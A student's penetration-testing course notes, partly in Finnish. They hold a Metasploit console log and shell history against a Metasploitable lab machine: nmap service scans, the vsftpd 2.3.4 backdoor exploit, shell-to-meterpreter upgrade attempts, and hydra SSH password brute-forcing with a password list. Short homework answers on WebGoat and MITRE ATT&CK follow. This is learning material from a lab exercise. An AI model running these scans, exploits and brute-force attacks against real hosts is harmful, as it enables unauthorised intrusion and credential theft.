[*] 172.28.128.3 - Command shell session 1 closed.  Reason: User exit
msf5 post(multi/manage/shell_to_meterpreter) > sessions 1
[-] Invalid session identifier: 1
msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

No active sessions.

msf5 post(multi/manage/shell_to_meterpreter) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > set RHOSTS 172.28.128.3
RHOSTS => 172.28.128.3
msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

No active sessions.

msf5 post(multi/manage/shell_to_meterpreter) > db_nmap -sV -n 172.28.128.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-24 11:21 UTC
[*] Nmap: Nmap scan report for 172.28.128.3
[*] Nmap: Host is up (0.00025s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 21/tcp   open  ftp         vsftpd 2.3.4
[*] Nmap: 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp   open  telnet      Linux telnetd
[*] Nmap: 25/tcp   open  smtp        Postfix smtpd
[*] Nmap: 53/tcp   open  domain      ISC BIND 9.4.2
[*] Nmap: 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp  open  rpcbind     2 (RPC #100000)
[*] Nmap: 139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp  open  exec        netkit-rsh rexecd
[*] Nmap: 513/tcp  open  login
[*] Nmap: 514/tcp  open  shell       Netkit rshd
[*] Nmap: 1099/tcp open  rmiregistry GNU Classpath grmiregistry
[*] Nmap: 1524/tcp open  bindshell   Metasploitable root shell
[*] Nmap: 2049/tcp open  nfs         2-4 (RPC #100003)
[*] Nmap: 2121/tcp open  ftp         ProFTPD 1.3.1
[*] Nmap: 3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
[*] Nmap: 5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
[*] Nmap: 5900/tcp open  vnc         VNC (protocol 3.3)
[*] Nmap: 6000/tcp open  X11         (access denied)
[*] Nmap: 6667/tcp open  irc         UnrealIRCd
[*] Nmap: 8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
[*] Nmap: 8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
[*] Nmap: MAC Address: 08:00:27:36:26:90 (Oracle VirtualBox virtual NIC)
[*] Nmap: Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
msf5 post(multi/manage/shell_to_meterpreter) > set RHOSTS 172.28.128.3
RHOSTS => 172.28.128.3
msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

No active sessions.

msf5 post(multi/manage/shell_to_meterpreter) > exploit
[-] Post failed: Msf::OptionValidateError The following options failed to validate: SESSION.
msf5 post(multi/manage/shell_to_meterpreter) > sessons 1
[-] Unknown command: sessons.
msf5 post(multi/manage/shell_to_meterpreter) > session 1
[-] Unknown command: session.
msf5 post(multi/manage/shell_to_meterpreter) > history
2    db_nmap -h
3    db_nmap
4    db_nmap -sV -n 10.10.10.140
5    db_nmap -sV -n -Pn 10.10.10.140
6    db_nmap -sS -n -Pn 10.10.10.140
7    db_nmap -sS -n -Pn 10.10.10.1-40
8    services --up -p 80,443
9    services
10   db_nmap -sV 10.10.10.1-50 -n -p 80,443 -vvv
11   services
12    db_nmap -sV 10.10.10.1-50 -n -p 80,443 -vvv
13   db_nmap -sV 10.10.10.100-110 -n -p 80,443 -vvv
14   services
15   exit
16   db_nmap -sV 10.10.10.100-110 -n -p 80,443 -vvv
17   services
18   services -p 80,443
19   services -p 80,443 -R --up
20   services -p 80,443 --up -R
21   back
22   exit
23   services -p 80,443 --up -R
24   nmap -sV -n -vvv 178.28.128.4
25   nmap -sV -n -vvv -Pn 178.28.128.4
26   nmap -sV -n -vvv 178.28.128.0-30
27   services  --up
28   nmap -sn -n -vvv 178.28.128.0-255
29   db_nmap -sn -n -vvv 178.28.128.0-255178.28.128.4178.28.128.4178.28.128.4178.28.128.4178.28.128.4178.28.128.4178.28.128.4178.28.128.4
30   services -up
31   services --up
32   db_nmap -n 172.28.128.1
33   db_nmap -n 172.28.128.1 -R
34   set RHOSTS 172.28.128.1
35   help
36   clear172.28.128.1
37   clear
38   set RHOSTS 172.28.128.1
39   search vsf
40   spool
41   msf exploit(vsftpd_234_backdoor)
42   exploit(vsftpd_234_backdoor)
43   use exploit(vsftpd_234_backdoor)
44   use exploit/unix/ftp/vsftpd_234_backdoor
45   info
46   help
47   chck
48   check
49   exploit
50   info
51   help
52   show options
53   sessions -l
54   ls
55   show options
56   exploit
57   back
58   db_nmap -n 172.28.128.1 -R
59   db_nmap -n 172.28.128.0-254 -R
60   set RHOSTS 172.28.128.0-254
61   search vsf
62   use exploit(vsftpd_234_backdoor)
63   use exploit/unix/ftp/vsftpd_234_backdoor
64   show options
65   set RHOSTS 172.28.128.0-254
66   exploit
67   services --up
68   db_nmap -sV -n 172.28.128.3
69   exploit
70   set RHOSTS 172.28.128.3
71   exploit
72   exit
73   sessions
74   sessions 1
75   search upgrade
76   use post/multi/manage/shell_to_meterpreter
77   options
78   LHOST
79   use LHOST
80   options
81   LHOST ip
82   help
83   run LHOST
84   use post/multi/manage/shell_to_meterpreter
85   sessions
86   options
87   exploit
88   sessions
89   exploit
90   sessions 1
91   sessions
92   use post/multi/manage/shell_to_meterpreter
93   set RHOSTS 172.28.128.3
94   sessions
95   db_nmap -sV -n 172.28.128.3
96   set RHOSTS 172.28.128.3
97   sessions
98   exploit
99   sessons 1
100  session 1
101  history

---
hashcat 
echo -n ‘mikaela’|md5sum
-> saa hashattyn ‘mikaela’
---
banner grabbing
----
luo filu jossa oletettuja käyttiksiä ja filu jossa oletettuja passuja,
lisää osoite jonne haluat mennä
hashcat pääsy toiselle koneelle ip:n mukaan
  118  ls
  119  nano passwords
  120  cat passwords
  121  hydra -l mikaela -P passwords
  122  ls
  123  pwd
  124  hydra -l mikaela -P passwords
  125  ssh topi@172.28.171.136
  126  hydra -l mikaela -P passwords ssh//:172.28.171.136
  127  hydra -l mikaela -P passwords ssh://172.28.171.136
  128  hydra -l mikaela -P passwords ssh//:172.28.171.136 -t 4
  129  hydra -l topi -P passwords ssh://172.28.171.136
  130  hydra -l topi -P passwords ssh//:172.28.171.136 -t 4
  131  hydra -l topi -P passwords ssh//:172.28.171.136
  132  hydra -l topi -P passwords ssh://172.28.171.136
  133  ls
  134  nano passwords
  135  cat passwords
  136  hydra -l topi -P passwords ssh://172.28.171.136
  137  exit
---
netcat - metsploit framework
searchssploit

Penetration Testing – Tunkeutumistestaus 

H2

a) Testaamani tehtävä oli WebGoatin “Challenge” -osio, jossa testasin ensimmäistä tehtävää. Onnistuin pikaisen spurttini aikana löytämään login-kentän käyttäjätunnuksen, joka oli löydettävissä tarkastelemalla POST kutsua, joka lähetetään submit -napin klikistä. Tarkastelemalla POST kutsua, voi huomata kentän user, jonka arvo kiinnittää huomion. Selviää, että kyseessä on base64 salattu koodi ja salauksen purkamisen jälkeen ilmeisen selkokielinen käyttäjätunnus. Ei tietenkään ole sopivaa tässä blogissa paljastaa mikä se tosiasiassa on 😉

b) Valitsin MITRE Att&ck -taktiikoista Access Token Manipulation -taktiikan, sillä se soveltuu mielestäni hyvin verkkosovelluksen haavoittuvuuksien etsimiseen. Tosin, kuvausta lukiessani, luulen, että olen ymmärtänyt tämän eri tavalla. Itse ymmärrän tämän taktiikan niin, että http-kutsun, joka siis pyytää/saa access tokenin, väliin mennään ja muutetaan sitä, joten itseasiassa valitsemani taktiikka taitaa sittenkin olla välimieshyökkäys. Mitren kuvauksessa puhutaan valheellisen tokenin luomisesta tai varastamisesta, prosessin aloittamisesta tokenilla ja samankaltaisen tokenin luomisesta haittakäyttöön, mutta konteksti vaikuttaa olevan Windows API, eikä esim. verkkosovelluksesta kutsuttavasta rajapinnasta.

Tehtävän lähteet:

http://terokarvinen.com/2019/penetration-testing-tunkeutumistestaus-ict4tn027-3004-intensive-summer-course-2019-w21w22-5-credits#comment-20368

Penetration Testing – Tunkeutumistestaus, Intensive Summer Course 2019 

h1:

1a) Kirjoitin Youtubeen “Capture the Flag Walkthrough” ja ensimmäisiä videoita hakutuloksista oli lopulta valitsemani video, jossa käytettiin itselleni täysin uusia työkaluja kuten nmap. Walkthrough:ssa worpressiin lisättiin haitallinen liitännäinen, joka kaappaa käyttäjän session, ajaa unix-privesc-check -skriptin joka etsii tiedostoja, joissa on käyttöoikeuksien kannalta haavoittuvuuksia. Haavoittuvuudet löytämällä videossa tehtiin käyttöoikeuksien korotus (privilege escalation hyökkäys). En kokeillut näistä vielä mitään, mutta olen kiinnostunut testaamaan tämäntyyppistä harjoitusta itsekin.

1b) Kali Linux Live USB -tikun lataus onnistui toisena kurssipäivänä. Googlasin ohjeet, jotka auttoivat huomattavasti tämän ollessa itselleni uusi asia. Luulin ensin, että tiedoston simppeli kopioiminen on riittävä tapa, mutta jutellessani kurssitoverin kanssa selvisi asian todellinen luonto. Käytin komentoa sudo dd if=kali-linux-xfce-2019.1a-amd64.iso of=/dev/sdf bs=512k. Käytin normaalia USB3 tikkua.

Tehtävänannon lähde:

http://terokarvinen.com/2019/penetration-testing-tunkeutumistestaus-ict4tn027-3004-intensive-summer-course-2019-w21w22-5-credits#comment-20368